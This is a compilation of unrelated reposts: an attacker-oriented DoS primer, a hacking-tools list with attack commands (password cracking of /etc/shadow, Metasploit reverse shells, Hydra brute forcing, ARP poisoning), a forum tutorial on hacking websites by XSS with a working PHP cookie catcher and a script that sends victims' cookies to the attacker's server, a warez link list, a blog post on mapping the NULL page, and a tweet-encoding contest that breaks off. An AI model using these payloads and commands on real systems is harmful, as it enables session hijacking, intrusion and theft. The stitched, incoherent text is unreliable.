Quick introduction to DoS and DDoS

With the worldwide expansion of the Internet, the hacker community developed new forms of attack, and the concepts of DoS (Denial of Service) and DDoS (Distributed Denial of Service) were born. This type of attack became popular by targeting entities for which the availability of services is both the key to success and the reason for existence: banks, ISPs, e-commerce websites, and so on, where every hour, minute, or even second of downtime can mean the loss of huge amounts of money.

Pre-Attack and Pre-Requirements

For a long time, one puzzle remained unsolved for many security professionals: when is the best time to create an attack network, before or after identifying the target? For the sake of neutrality, let's say that the best time depends on the objective to achieve, the attacker's mentality, and the attacker's skills.
One might assume that a pre-target-identification attack network that is fully functional at the zero hour has the same impact as a post-target-identification attack network of the same size and power, but in reality this is not quite true. A pre-target-identification network has to sit idle for longer, which causes network nodes to drop out, either because a sysadmin covers, fixes, or patches the attacker's entry point, or because more restrictive security measures are put in place.
The methodology used to expand an attack network has also changed since the earliest *DoS attacks. What started as simple host-by-host compromise, with each new host appended to the network, turned into a battle of "intelligent" scripts and worms capable of doing the job on their own, with almost no human intervention, and with power far superior to the individual host-by-host method.
Once the attack network is formed, picture the attacker as a pyrotechnician with all his fireworks ready to launch and begin the show... The countdown clock reaches zero... The attacker presses the trigger (or some pre-scheduled event occurs)... The show begins... But what happens?

Post Attack Analysis

From the uninformed victim's point of view, the attack was apparently conducted by many attackers at the same time, almost like an army marching on a castle: the real enemy is the army's leader, and the soldiers themselves are merely the attacker's puppets. This lack of knowledge buys the attacker time, forcing the victim through the painful back-trace process, which, given a small budget, the high cost of the analysis, and the scale of the damage caused, can end with the attack's forensics being suspended altogether.

Protection layers

It is fairly obvious that the more protection layers exist between the attacker and the victim, the more anonymous and protected the attacker's identity will be, and the more difficulty the victim will have unveiling the attack's source.
A high number of layers will, as expected, introduce lag between layers, which, if badly planned, can lead to the total or partial failure of the attack. On the other hand, a small number of layers can lead to easy detection of the attacker, and therefore serious consequences for him. In sum, it is essential to strike a balance between both extremes to obtain a successful attack and effective risk distribution.

Other types of DoS

Other attacks aimed at the basic, essential resources of companies and individuals are "un-wired". Examples include electrical or telephone cuts, extreme adverse weather (bearing in mind that this "attack" is not controlled by the attacker), access cuts (roads, etc.), and probably the most common form: the interception and/or manipulation, followed by denial, of information or data transmitted via mail and similar channels.

Reference: http://www.astalavista.com/page/articles/_/lectures/quick-introduction-to-dos-and-ddos-r25

Top 10 Linux Hacking Tools

For installation of packages on each distribution:

Ubuntu: apt-get install program name
Fedora: yum install program name
Open Suse: zypper install program name
Debian: apt-get install program name
Gentoo: emerge -v program name
Arch Linux: pacman -S program name

Just replace "program name" with the program you want to install. Again, if you need any help, PM me.


1. Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.
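For example, a typical pair of scans might look like this (the addresses below are just placeholders for your own targets):

# Ping-scan a subnet for live hosts
nmap -sP 192.168.1.0/24

# SYN scan one host with service-version and OS detection (needs root)
nmap -sS -sV -O 192.168.1.1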

2. Aircrack :
~The fastest available WEP/WPA cracking tool~
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
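A minimal WEP-cracking session with the current aircrack-ng releases of these tools might look like this (interface name, channel, and BSSID are placeholders):

# Put the wireless card into monitor mode
airmon-ng start wlan0

# Capture packets on channel 6, writing capture files to disk
airodump-ng -c 6 -w capture mon0

# Once enough IVs have been gathered, crack the WEP key
aircrack-ng -b 00:11:22:33:44:55 capture-01.cap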

3. Nessus :
~Premier UNIX vulnerability assessment tool~
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.
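Getting a classic Nessus setup running follows its daemon/client model; roughly like this, though the exact commands vary between Nessus versions:

# Create a user that is allowed to run scans
sudo nessus-adduser

# Start the Nessus daemon in the background
sudo nessusd -D

# Then connect to the daemon with the Nessus client and start scanning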


4. Snort :
~Everyone's favorite open source IDS~
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.
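Two quick ways to try it (the interface and config path below are the usual defaults; adjust to taste):

# Sniffer mode: print packet headers to the console
snort -v -i eth0

# IDS mode: apply the rules from the configuration file
snort -c /etc/snort/snort.conf -i eth0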

5. Wireshark :
~Sniffing the glue that holds the Internet together~
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tshark (formerly tethereal) is included. One word of caution is that Wireshark has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).
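For example, using the console version from a terminal (interface and file names are placeholders):

# Capture 100 packets on eth0 and save them for later analysis
tshark -i eth0 -c 100 -w capture.pcap

# Read the capture back, showing only HTTP traffic
tshark -r capture.pcap -R http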

6. John the Ripper :
~A powerful, flexible, and fast multi-platform password hash cracker~
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types can be added with contributed patches. You will want to start with some wordlists, which are easy to find online.

**NOTE: For John the Ripper, the package name you use to install is john**
e.g. apt-get install john
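A basic run against a Unix password file looks like this (file names are examples):

# Merge passwd and shadow into John's input format (needs root)
sudo unshadow /etc/passwd /etc/shadow > mypasswd

# Crack using a wordlist, then display any cracked passwords
john --wordlist=wordlist.txt mypasswd
john --show mypasswd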

7. Kismet :
~A powerful wireless sniffer~
Kismet is a console (ncurses) based 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating.


8. Metasploit Framework :
~Hack the Planet~
Metasploit took the security world by storm when it was released in 2004. No other new tool had ever debuted so high in the community's tool rankings, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas, already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

**NOTE: The Metasploit Framework is usually not in your distribution's package repositories; you can read about it and download it at metasploit.com**
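Once you have it, a typical msfconsole session follows a pick-module, set-options, run pattern. The module name and addresses below are only illustrative:

msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.10
msf > set LHOST 192.168.1.5
msf > exploit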

9. Nikto :
~A more comprehensive web scanner~
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version-specific problems on over 230 servers. Scan items and plugins can be updated automatically (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but its value depends on keeping those updates current: when they lag, the newest and most critical vulnerabilities can go undetected.
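Usage is a one-liner (the hostname is a placeholder):

# Scan a web server on the default port
nikto -h www.example.com

# Scan an SSL server on port 443
nikto -h www.example.com -p 443 -ssl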

10. Netcat :
~The network Swiss army knife~
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find a copy of nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations, often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more, and which has earned a place on security tool lists in its own right.
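Two classic examples using the traditional nc syntax (hosts, ports, and file names are placeholders):

# Receive a file: listen on TCP port 4444 on one machine...
nc -l -p 4444 > received.txt

# ...and send the file to it from another machine
nc 192.168.1.5 4444 < secret.txt

# Speak HTTP to a web server by hand
echo -e "GET / HTTP/1.0\r\n\r\n" | nc www.example.com 80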

11.THC Hydra:
~A Fast network authentication cracker which supports many different services~
When you need to brute-force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap, this release is from the fine folks at THC.

You can get THC Hydra from the THC website.
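A typical dictionary attack uses the classic "options, target, service" syntax (the user, wordlists, and address below are placeholders):

# Try one login name against a password list on the target's FTP service
hydra -l admin -P passwords.txt 192.168.1.10 ftp

# Same idea against telnet, with a list of user names as well
hydra -L users.txt -P passwords.txt 192.168.1.10 telnet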

12. Ettercap :
~In case you still thought switched LANs provide much extra security~
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
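For example, a text-mode ARP-poisoning man-in-the-middle between a gateway and a victim (the addresses are placeholders; note that the target syntax differs slightly between ettercap versions):

# -T: text-only interface; -M arp:remote: ARP-poison both targets
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.7/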

Reference: hackforums.net

[Tut] How to Hack a Website by XSS

Hello Guys !

I am going to teach you how to hack a website through XSS (Persistent Cross Site Scripting).

I wrote it because I didn't find a nice tut that explains XSS. I didn't add many pics, as I don't want to hack a website just for a tut. But this is pretty easy, and you will learn without much difficulty.



" Something about XSS " :-


XSS basically means using JavaScript in different forms to get at the details of a user's profile on the target website. With the help of XSS we can steal the cookies of the website's users, including its owner.
XSS is a very large concept, and your success rate depends on your imagination and experience.
SQL injection and keylogging are the kind of attacks where you follow fixed steps to execute something,
whereas XSS is about understanding the different ways JavaScript can be used,
and the places on a website where your scripts will execute may differ from site to site.


So I could say that XSS, or cross-site scripting, means taking advantage of web applications that take user input but don't filter it properly. This allows an attacker to inject HTML or script code and pull hidden information out of the application. The most common information people go after with
XSS is cookies. Cookies are used to maintain a user's authenticated session on the website.



" XSS " :-


* Search boxes :- Almost all websites have a search box where you can try searching for something on the site.
In the search box you can type your malicious script and check for the vulnerability.



* Text boxes :- Any other text box on the website that lets you submit some input is also a candidate.

So we are trying to find a place where we can write something which will later be shown back on the same webpage.




" Types of XSS " :-



There are 2 types of XSS vulnerability.


1. Persistent Cross Site Scripting

2. Non-persistent Cross site Scripting.



Let's start with Persistent Cross Site Scripting.


" Persistent Cross Site Scripting " :-



A persistent cross-site scripting vulnerability exists when the malicious code you inject is stored permanently on the website. To understand it better, I will give you a little example.

Suppose you found a forum which is vulnerable to XSS. You can create a "New Topic" or "New Thread" on the forum. Every time some user or the admin opens that particular thread, your code, which was never filtered out due to the weak security of the website, gets executed, and the user's or admin's cookies are sent to you at a "cookie catcher": a .php file stored on your own website. This website could be a free hosting account.



Let's suppose we have http://www.example.com.
It's just an example domain, not a real target! =P




" Checking for Vulnerability " :-



Now, the very first thing we have to find is a place where we can input some text
that will later be displayed back to us.

As an example of a secure site: on Hackforums.com we have a search bar, so let's
put "test" in the search bar and hit enter.
You will see that it says "Sorry, but no results were returned using the query information you provided.
Please redefine your search terms and try again."
But notice that it does NOT say "No search results found for 'test'".
That means it is not echoing the word we put into the search bar,
so there is no chance to exploit the search bar of Hackforums. A vulnerable site, by contrast, will reflect your input back into the page.

" Testing Java Scripts " :-



Now, suppose our target site does echo our input back, so it may be vulnerable to XSS.
We will try to run a small JavaScript snippet on the website.



<script type="text/javascript">alert('test')</script>


What this will do is pop up a little alert box saying "test".
And if it does that, it means the site accepts JavaScript input as well.


Remember: you can even use -
<script type="text/javascript">alert('your Name')</script>

It will show an alert box with that name in it.



Once you're done, just click on the "Ok" or "Preview" button at the bottom.
And on the next page you should get a popup that says "test".




" Finding Cookies " :-


Now, since we have seen that the website IS accepting JavaScript input and executing it on the next page, let's try to do something else with JavaScript. First of all, I want you guys to understand what cookies are and where you find them. Type the following command into the address bar of your web browser.

javascript:alert(document.cookie)

As soon as you type that command and hit enter, a popup should appear showing your cookies for the current website. Make sure you are logged in to see your session cookies. As I said before, cookies are what hold the session information and log you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS we find some way to get those cookies sent to us.


Now, let's try to find a way to get these cookies sent to us with the help of JavaScript.




" Creating Cookie Catcher " :-



The cookie catcher is a file which you will have to upload to a web hosting account of yours, with its permissions changed to 777 so it can write out the cookies it grabs. Copy the following code and paste it into Notepad.

<?php
// Grab the cookie from the "c" GET parameter
$cookie = $_GET['c'];
// Record the victim's IP, the time, and the referring page
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
// Append everything to cookies.html
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: ' . $cookie . '<br>' .
            'IP: ' . $ip . '<br>' .
            'Date and Time: ' . $date . '<br>' .
            'Referer: ' . $referer . '<br><br>');
fclose($fp);
// Send the victim on to an innocent-looking page
header("Location: http://www.yoursite.com");
?>



Just a little elaboration on the script: the first statement gets the cookie,
the next ones get the IP, the date, and the referer,
and the header() call at the end sends the victim on to "yoursite.com".
To make it a little less suspicious, you can change that link back to the vulnerable site itself,
so the victim won't see anything unusual. Copy the given code and put it into Notepad.
Save it as something.php. Just make sure that you change the format to ".php".

You'll need a free web hosting account where you can upload the file. I personally use "spam.com", so create an account there and upload this php file. Make sure that you change its permissions to "777".



" Testing Cookie Catcher " :-


Now, as you guys have seen, we have been executing a little script on that page which brings
up an alert box. Let's go a little more advanced and try to send our own cookies to our cookie catcher.



<script>document.location="http://link-of-your-cookie-catcher?c=" + document.cookie;</script>




" Elaboration on the script " :-


document.location changes the location (URL) of the page, and we set it equal to the
link of our cookie catcher. We add "?c=" because the catcher reads the cookie from the GET parameter c,
and "+ document.cookie" appends the cookies of the victim's site to that request,
so the catcher can record them.



Now for the second step: let's try it and see if it works. I am going to use the script shown above in the
"Something" page of example.com.




Now, if you click on Ok or Preview, it will take you to yoursite.com OR whatever you changed
the link to in the cookie catcher. Now log back in to your spam.com account, and you will
notice that another file, "cookies.html", has been created automatically.



Now, if you open up that automatically created file, you will notice some cookies inside it.


Cookie: undefined
IP: MY IP
Date and Time: 3 April, 2010, 2:03 am
Referer: http://www.example.com/preview.php?incli...ect=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview



Note: This will look a little different from actual cookies, because when I stole these,
I wasn't logged in; if a user is logged in, you will get something a little different from this.

Now, get the "Cookie Editor" add-on for Mozilla Firefox.


" Stealing Actual Cookies " :-


Till now, we were our own victim: we were stealing our own cookies to make sure this works.
Now, let's try to get some actual victims. On some sites, you may have to PREVIEW the post first and
then submit it; the JavaScript gets executed whenever you preview it, so we cannot
submit it because the script has already executed. On other sites, you can directly
submit the post, so the moment someone opens it, you get the cookies.



When you put the script in the "NAME" field (and something or other in the other fields) and click Preview,
the URL will change to something else for a moment, QUICKLY, before the page redirects you
to the site configured in your cookie stealer.
That is what you will have to copy. What I copied was this:


http://example.com/preview.php?inclinati...ew=Preview


Then you just give this link to your victim; as soon as they click on it, you get the cookies.

The persistent case is even more useful, because there you don't have to ask victims to click on a link at all:
you actually submit the post, so as soon as someone reads it, you get the cookies.

Reference: hackforums.net [cyclone]

WIFISLAX-Live CD WIFI Hack


Wireless Hacking LiveCD FBI 2010 | 630 MB

An edited and slightly updated version of the popular LiveCD for working with wireless networks. Based on Ubuntu, it provides a graphical interface. The disk is bootable, and a script is included for installing it to a PC hard drive or a virtual machine (VirtualPC is not supported). It integrates over 50 tools for working with networks: scanners, sniffers, password crackers, and other utilities. On top of this, it is a full Linux system with a stable kernel. Once installed on the hard disk, the system can be localized, extended, and adjusted to the owner's taste. It also includes Back Track 4, a very powerful set of tools for working with networks, above all wireless ones, and a decent set of drivers for many types of adapters. The image has circulated on the net in various versions since 2007, along with the popular claim that the FBI had something to do with its creation.
Requirements:
RAM: 256 MB
CPU: 800 MHz
HDD: 4 GB

Checksums:
CRC32: 0D504602
MD5: D6E4E9DBCE86DC165DCF248081E4F421
SHA-1: 489BE5B921211986F47EECA42EE516275BE94267

Year: 2010
Developer: GNU
Type: Hack & Tools
Medicine: Not required
Size: 630 MB
http://hotfile.com/dl/42033254/285b29c/Wireless_Hacking_LiveCD_FBI_v_2010.part1.rar.html
http://hotfile.com/dl/42033361/eed387f/Wireless_Hacking_LiveCD_FBI_v_2010.part2.rar.html
http://hotfile.com/dl/42033499/4ee96bb/Wireless_Hacking_LiveCD_FBI_v_2010.part3.rar.html
http://hotfile.com/dl/42033607/596db3c/Wireless_Hacking_LiveCD_FBI_v_2010.part4.rar.html


Reference: r00tsecurity

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we’re always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.
If you’ve ever programmed in C, you’ve probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded “Segmentation Fault”. Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today’s installment, we’ll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I’ll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!
What’s in a pointer?
There’s nothing fundamentally magical about pointers in C (or assembly, if that’s your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer’s memory. We can write a C program to print out a random pointer:
#include <stdio.h>

int main(int argc, char **argv) {
    printf("The argv pointer = %d\n", argv);
    return 0;
}

Which, if you run it on my machine, prints:
The argv pointer = 1680681096
(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that’s just a notational thing. They’re still just integers.)
NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it’s just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.
But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you’re browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It’s actually even worse than that: a bug in IE can even take down the entire operating system.
This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means is that every program running on your computer has its own namespace for pointers (from 0 to 2^32 - 1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other’s memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program’s address space to different pieces of physical memory.

mmap(2)
One feature of this setup is that while each process has its own 2^32 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.
Because each application has its own address space, however, it is free to do with it as it wants. For instance, you’re welcome to declare that NULL should be a valid address in your application. We refer to this as “mapping” the NULL page, because you’re declaring that that area of memory should map to some piece of physical memory.
On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:
void *mmap(void *addr, size_t length, int prot, int flags,
int fd, off_t offset);
Let’s go through those arguments in order (All of this information comes from the man page):
addr
This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
length
The length of the region the application wants to map. Memory can only be mapped in increments of a “page”, which is 4k (4096 bytes) on x86 processors.
prot
Short for “protection”, this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
flags
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
fd
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process’s address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we’re going pass MAP_ANONYMOUS in flags, which indicates that we don’t want to map a file, and fd is irrelevant.
offset
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.
If we just want to be able to read and write the NULL pointer, we’ll want to set addr to 0 and length to 4096, in order to map the first page of memory. We’ll need PROT_READ and PROT_WRITE to be able to read and write, and all three of the flags I mentioned. fd and offset are irrelevant; we’ll set them to -1 and 0 respectively.
Putting it all together, we get the following short C program, which successfully reads and writes through a NULL pointer without crashing!
(Note that most modern systems actually specifically disallow mapping the NULL page, out of security concerns. To run the following example on a recent Linux machine at home, you’ll need to run # echo 0 > /proc/sys/vm/mmap_min_addr as root, first.)
#include <sys/mman.h>
#include <stdio.h>

int main() {
    int *ptr = NULL;
    if (mmap(0, 4096, PROT_READ|PROT_WRITE,
             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0)
        == MAP_FAILED) {
        perror("Unable to mmap(NULL)");
        fprintf(stderr, "Is /proc/sys/vm/mmap_min_addr non-zero?\n");
        return 1;
    }
    printf("Dereferencing my NULL pointer yields: %d\n", *ptr);
    *ptr = 17;
    printf("Now it's: %d\n", *ptr);
    return 0;
}
Next time, we’ll look at how a process can not only map NULL in its own address space, but can also create mappings in the kernel’s address space. And, I’ll show you how this lets an attacker use a NULL dereference in the kernel to take over the entire machine. Stay tuned!
The 1st International Longest Tweet Contest
Posted in Programming on March 25th, 2010 by Keith Winstein – 30 Comments
How much information is in a tweet?
There are a lot of snarky answers to that. Let’s talk mathematically, where information is measured in bits: How many bits can be expressed in a tweet?
It’s kind of fun to try to figure out how to cram in the most information. Our current in-house record is 4.2 kilobits (525 bytes) per tweet, but this can definitely be bested. Twitter’s 140-character limit has been under assault for some time, but nobody has decisively anointed a winner.
To that end, announcing the 1st International Longest Tweet Contest, along the lines of the International Obfuscated C Code Contest. The goal: fit the most bits of information into a tweet. There will be glorious fame and a T-shirt for the winner. More on that later. But first, a dialog:
Ben Bitdiddle: How big can a tweet get? SMS is limited to 160 characters of 7-bit ASCII, or 1,120 bits. Since Twitter based their limit on SMS but with 20 characters reserved for your name, a tweet is probably limited to 140 × 7 = 980 bits.
Alyssa P. Hacker: Not quite — despite its SMS roots, Twitter supports Unicode, and the company says its 140-character limit is based on Unicode characters, not ASCII. So it’s a lot more than 980 bits.
Ben: Ok, Unicode is a 16-bit character set, so the answer is 140 × 16 = 2,240 bits.
Alyssa: Well, since that Java documentation was written, Unicode has expanded to cover more of the world’s languages. These days there are 1,112,064 possible Unicode characters (officially “Unicode scalar values”) that can be represented, including in the UTF-8 encoding that Twitter and most of the Internet uses. That makes Unicode about 20.1 bits per character, not 16. (Since log2 1,112,064 ≈ 20.1.)
Ben: Ok, if each character can take on one of 1,112,064 possible values, we can use that to figure out how many total different tweets there can ever be. And from that, we’ll know how many bits can be encoded into a tweet. But how?
Alyssa: It’s easy! We just calculate the total number of different tweets that can ever be received. The capacity of a tweet, in bits, is just the base-2 logarithm of that number. According to my calculator here, 1,112,064 to the 140th power is about 28.7 quattuordecillion googol googol googol googol googol googol googol googol. That’s the number of distinct 140-character messages that can be sent. Plus we have to add in the 139-character messages and 138-character messages, etc. Taking the log, I get 2,811 bits per tweet.
Ben: We’d get almost the same answer if we just multiplied 20.1 bits per character times 140 characters. Ok, 2.8 kilobits per tweet.
Alyssa: I just discovered a problem. There aren’t that many distinct tweets! For example, I can’t tell the difference between the single character ‘<’ and the four characters ‘&lt;’. I also can’t send a tweet that contains nothing but some null characters. So we have to deflate our number a little bit. It’s tricky because we don’t know Twitter’s exact limitations; it’s a black box.
Ben: But the answer will still be roughly 2.8 kilobits. Can we do better?
Alyssa: By golly, I think we can! Turns out Unicode is basically identical to an international standard, called the Universal Multi-Octet Coded Character Set, known as UCS or ISO/IEC 10646. But the two standards weren’t always the same — in the 90s, there was a lot of disagreement between the computer companies who backed Unicode and proposed a simple 16-bit character set, and the standards mavens behind UCS, who wanted to accommodate more languages than 65,536 characters would allow. The two sides eventually compromised on the current 20.1-bit character set, but some historical differences still linger between the two “official” specifications — including in the definition of the UTF-8 encoding that Twitter uses. Check this out:


Alyssa: Although Unicode’s UTF-8 can only encode the 1,112,064 Unicode scalar values, UCS’s version of UTF-8 is a lot bigger — it goes up to 31 bits!
Ben: So, when Twitter says they use UTF-8, which version are they using? Unicode, or UCS?
Alyssa: Hmm, that’s a good question. Let’s write a program to test. I’ll send Twitter a really big UCS character in UTF-8, represented in octal like this. This is way outside the bounds of well-formed Unicode.
$ perl -Mbytes -we 'print pack "U", (2**31 - 5)' | od -t o1
0000000 375 277 277 277 277 273

Ben: Hey, that kind of worked! When we fetch it back using Twitter’s JSON API, we get this JSON fragment:
"text":"\\375\\277\\277\\277\\277\\273"

Alyssa: It’s the same thing we sent! The character (really an unassigned code position) is represented in UTF-8, in octal with backslashes in ASCII. That means Twitter “characters” are actually 31 bits, not 20.1 bits. The capacity of a tweet is actually a lot bigger than the 2.8 kilobits we calculated earlier.
Ben: Should we worry that the text only shows up in the JSON API, not XML or HTML, and these high characters only last a few days on Twitter’s site before vanishing?
Alyssa: Nope. As long as we had this exchange in our conversation, people on the Internet won’t complain about those issues.
Using Alyssa’s insight that Twitter actually supports 31-bit UCS characters (not just Unicode), we can come up with a simple program to send 4.2-kilobit tweets using only code positions that aren’t in Unicode. That way there’s no ambiguity between these crazy code positions, which Twitter represents as backslashed octal, and legitimate Unicode, which Twitter sends literally. These tweets have a text field that’s a whopping 3,360 bytes long — but in ASCII octal UTF-8, so they only represent 525 bytes of information in the end.
The sender program reads the first 525 bytes of standard input or a file, slices it into 30-bit chunks, and sends it to Twitter using 31-bit UCS code positions. The high bit of each character is set to 1 to avoid ever sending a valid Unicode UTF-8 string, which Twitter might treat ambiguously. It outputs the ID of the tweet it posted. You’ll have to fill in your own username and password to test it.
The receiver program does the opposite — give it an ID on the command line, and it will retrieve and decode a “megatwit” encoded by the sender.
Here’s an example of how to use the programs and verify that they can encode at least one arbitrary 4,200-bit message:
$ dd if=/dev/urandom of=random.bits bs=525 count=1
1+0 records in
1+0 records out
525 bytes (525 B) copied, 0.0161392 s, 32.5 kB/s
$ md5sum random.bits
a7da09e59d1b6807e78aac7004e6ba41 random.bits
$ ./megatwit-send < random.bits
11037181699
$ ./megatwit-get 11037181699 | md5sum
a7da09e59d1b6807e78aac7004e6ba41 -

But this is just the start -- we're not the only ones interested in really long tweets. (Structures, strictures...) Others have found an apparent loophole in how Twitter handles some URLs, allowing them to send tweets with a text field up to 532 bytes long (how much information can be coded this way isn't clear). Maxitweet has come up with a clever way to milk the most out of 140 Unicode characters without requiring a decoder program, at least at its lower compression levels. There are definitely even better ways to cram as many bits as possible into a tweet.
So here is the challenge for the 1st International Longest Tweet Contest:
Come up with a strategy for encoding arbitrary binary data into a single tweet, along the lines of the sample programs described here.
Implement a sender and receiver for the strategy in a computer programming language of your choice. We recommend you choose a language likely to be runnable by a wide variety of readers. At your option, you may provide a Web site or other public implementation for others to test your coding scheme with arbitrary binary input.
